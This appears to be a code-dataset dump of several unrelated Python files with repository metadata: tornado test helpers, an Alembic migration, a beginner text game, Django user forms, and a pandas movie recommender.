if sock is not None:
sock.close()
return True
skipIfNoIPv6 = unittest.skipIf(not _detect_ipv6(), 'ipv6 support not present')
def refusing_port():
"""Returns a local port number that will refuse all connections.
Return value is (cleanup_func, port); the cleanup function
must be called to free the port to be reused.
"""
# On travis-ci, port numbers are reassigned frequently. To avoid
# collisions with other tests, we use an open client-side socket's
# ephemeral port number to ensure that nothing can listen on that
# port.
server_socket, port = bind_unused_port()
server_socket.setblocking(1)
client_socket = socket.socket()
client_socket.connect(("127.0.0.1", port))
conn, client_addr = server_socket.accept()
conn.close()
server_socket.close()
return (client_socket.close, client_addr[1])
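# Illustrative sketch only (not tornado code): a test needing a guaranteed
# connection-refused target would use refusing_port roughly like this:
#
#     cleanup_func, port = refusing_port()
#     try:
#         self.assertRaises(IOError, socket.create_connection,
#                           ("127.0.0.1", port))
#     finally:
#         cleanup_func()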
def exec_test(caller_globals, caller_locals, s):
"""Execute ``s`` in a given context and return the result namespace.
Used to define functions for tests in particular python
versions that would be syntax errors in older versions.
"""
# Flatten the real global and local namespace into our fake
# globals: it's all global from the perspective of code defined
# in s.
global_namespace = dict(caller_globals, **caller_locals) # type: ignore
local_namespace = {}
exec(textwrap.dedent(s), global_namespace, local_namespace)
return local_namespace
def subTest(test, *args, **kwargs):
"""Compatibility shim for unittest.TestCase.subTest.
Usage: ``with tornado.test.util.subTest(self, x=x):``
"""
try:
subTest = test.subTest # py34+
except AttributeError:
subTest = contextlib.contextmanager(lambda *a, **kw: (yield))
return subTest(*args, **kwargs)
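# A hedged usage sketch (illustrative, not part of tornado's test suite):
# exec_test lets a test module define syntax that would not parse on older
# interpreters, e.g. a native coroutine gated behind skipBefore35:
#
#     namespace = exec_test(globals(), locals(), """
#         async def f():
#             return 42
#     """)
#     f = namespace['f']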
| [
"[email protected]"
] | |
76312bdcf2c0cb870c0669be05da954c69104c19 | 39bf3bec014e64e80df52b697c9a8ba841dbb121 | /migrations/versions/1aae715e7889_.py | 1e8f08fe69be586899d07cc42c5adfac9d538bc1 | [] | no_license | f0rtun3/nexure-backend | e233c00830e418d7191949fdb062cb4c2c547cfa | 5daadc81c2dac3dc936cb2fd58a8f113846201e0 | refs/heads/master | 2022-04-06T00:59:01.922040 | 2020-02-22T15:47:18 | 2020-02-22T15:47:18 | 194,633,366 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 917 | py | """empty message
Revision ID: 1aae715e7889
Revises: de4bf6718891
Create Date: 2019-09-27 11:37:30.461476
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '1aae715e7889'
down_revision = 'de4bf6718891'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('organization_customer', sa.Column('org_reg_number', sa.String(length=50), nullable=True))
op.drop_column('organization_customer', 'org_registration_number')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('organization_customer', sa.Column('org_registration_number', sa.VARCHAR(length=50), autoincrement=False, nullable=True))
op.drop_column('organization_customer', 'org_reg_number')
# ### end Alembic commands ###
| [
"[email protected]"
] | |
41dd8a8167fa73c682f82e184e86c74410f5ba54 | f9977e4436647909615efc78155c13bf4b22c7a3 | /APCS3.py | 49b41eab05ebff34539569b6b060dc062e4a08bc | [] | no_license | AtamKing/APCS | 1627e9ddf111853770aa724491366e4fa5ebed31 | 15e2fcc3fdee069dd8e7a5cdb4d243a38368c9b7 | refs/heads/master | 2021-04-30T04:44:24.706565 | 2018-02-14T18:07:00 | 2018-02-14T18:07:00 | 121,543,315 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 749 | py | import time
print("To play this game you may need some instructions.")
print("You will be asked questions and given responces to choose from.")
print("Type your responce then hit enter.")
print("To check your inventory type inventory and to drop an item type the item number.")
print("To use an item type use /Item name/")
start = (input("Enter start to start game.\n\n"))
Q1 = input("zzzzz...\n\nWAKE UP!!!\n\nA. WHAT HAPPENED?!\nB. 5 more minuets.\n\n")
if start == True:
print(Q1)
if Q1 == "A":
print("explanaitionsjgfh")
if Q1 == "B":
print("FINE")
time.sleep(300)
print(Q1)
if start == "start":
start == True
else:
start == False
print("start")
| [
"[email protected]"
] | |
10e78e45543f83aebb130d335505cc3f7e5335f8 | 35656324f2c2b3f7713c8ee8ca3af73521319f1b | /accounts/forms.py | dd56ac72690d3aa5fb1b56f41abbca89ed4623f5 | [
"CC0-1.0"
] | permissive | jorgegomesen/djangosecommerce | 15beb3c7f4276cd3250c393b7c3c470cfe6dc0af | 22541d24af52cd6f2d51196116a101583389b945 | refs/heads/main | 2023-05-30T06:09:23.608322 | 2021-06-14T08:37:06 | 2021-06-14T08:37:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 380 | py | from django.contrib.auth.forms import UserCreationForm
from .models import User
from django import forms
class UserAdminCreationForm(UserCreationForm):
    class Meta:
        model = User
        fields = ['username', 'name', 'email']


class UserAdminForm(forms.ModelForm):
    class Meta:
        model = User
        fields = ['username', 'name', 'email', 'is_active', 'is_staff']
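# A hedged sketch of how these forms are typically wired up in a companion
# accounts/admin.py (the attributes below are assumptions inferred from the
# model fields used here, not code from this project):
#
#     from django.contrib import admin
#     from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
#
#     from .forms import UserAdminCreationForm, UserAdminForm
#     from .models import User
#
#     class UserAdmin(BaseUserAdmin):
#         add_form = UserAdminCreationForm  # used by the "add user" page
#         form = UserAdminForm              # used by the change page
#         list_display = ('username', 'name', 'email', 'is_staff')
#
#     admin.site.register(User, UserAdmin)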
| [
"[email protected]"
] | |
1a9f46bb191c3c5bf65c5735eef1d693c64b3685 | 8b2f0e2d3dae3cdba29caa4bc28f3482b138a42c | /MovieRecommendationSystem.py | 5a2ac991186ed1a8256ef2ff650b32ac830d0c7b | [] | no_license | MichaelRinglein/MachineLearning | 57d49b756c147b3c2673df49f4ba110b0ba33449 | a2970e64f18143dd65eff198bc87a0c2f4745f6b | refs/heads/master | 2020-03-28T12:30:38.665222 | 2018-09-22T14:09:58 | 2018-09-22T14:09:58 | 148,305,241 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,329 | py | # Movie recommendation system
# Item based collaborative filtering
import pandas as pd
import numpy as np
# Sorting the data
r_cols = ['user_id', 'movie_id', 'rating']
ratings = pd.read_csv('ratings.data', sep='\t', names=r_cols, usecols=range(3), encoding="ISO-8859-1")
m_cols = ['movie_id', 'title']
movies = pd.read_csv('movies.item', sep='|', names=m_cols, usecols=range(2), encoding="ISO-8859-1")
ratings = pd.merge(movies, ratings)
#print(ratings.head())
# Creating a new table to look at relationship between movies from each user_id
# We want to see which movies a given user (e.g. user id 1) has rated
movieRatings = ratings.pivot_table(index=['user_id'], columns=['title'], values='rating')
#print(movieRatings.head())  # e.g. user 1 has rated '101 Dalmatians' and '12 Angry Men', among others
# Extracting the users who rated Star Wars
starWarsRatings = movieRatings['Star Wars (1977)']
#print(starWarsRatings.head())
# Finding out the correlation of Star Wars' ratings to other movies, using corrwith
similarMovies = movieRatings.corrwith(starWarsRatings)
similarMovies = similarMovies.dropna() #Dropping missing results
df = pd.DataFrame(similarMovies)
#print(df.head())
# Sorting the results
sorted = similarMovies.sort_values(ascending=False)
#print(sorted)
# Many of the highly correlated movies don't make sense as recommendations
# for someone who rated Star Wars highly; something is off. Obscure movies
# rated by only a handful of users produce spurious perfect correlations.
# Throwing out the movies that have beeen rated just few times
movieStats = ratings.groupby('title').agg({'rating':[np.size, np.mean]}) #creating new dataframe aggregating together the number of ratings and mean of rating for every movie title
#print(movieStats.head())  # e.g. '101 Dalmatians' has 109 ratings, but a movie called '1-900' has just 5
# Keeping only movies that have been rated at least 100 times
popularMovies = movieStats['rating']['size'] >= 100
print(movieStats[popularMovies].sort_values([('rating', 'mean')], ascending=False)[:15])
# Joining together with the original data set
df = movieStats[popularMovies].join(pd.DataFrame(similarMovies, columns=['similarity']))
print(df.head()) #makes more sense
# Sorting by similarity to Star Wars
print(df.sort_values(['similarity'], ascending=False)[:15])
# Now this looks reasonable
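# A hedged generalization of the pipeline above (a sketch reusing the
# movieRatings, movieStats and popularMovies objects already built):
def similar_to(title, n=10):
    # Correlate every movie's rating vector with the target title's ratings,
    # then keep only well-rated movies and sort by similarity.
    sims = movieRatings.corrwith(movieRatings[title]).dropna()
    candidates = movieStats[popularMovies].join(pd.DataFrame(sims, columns=['similarity']))
    return candidates.sort_values(['similarity'], ascending=False)[:n]

# Example: print(similar_to('Star Wars (1977)'))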
| [
"[email protected]"
] |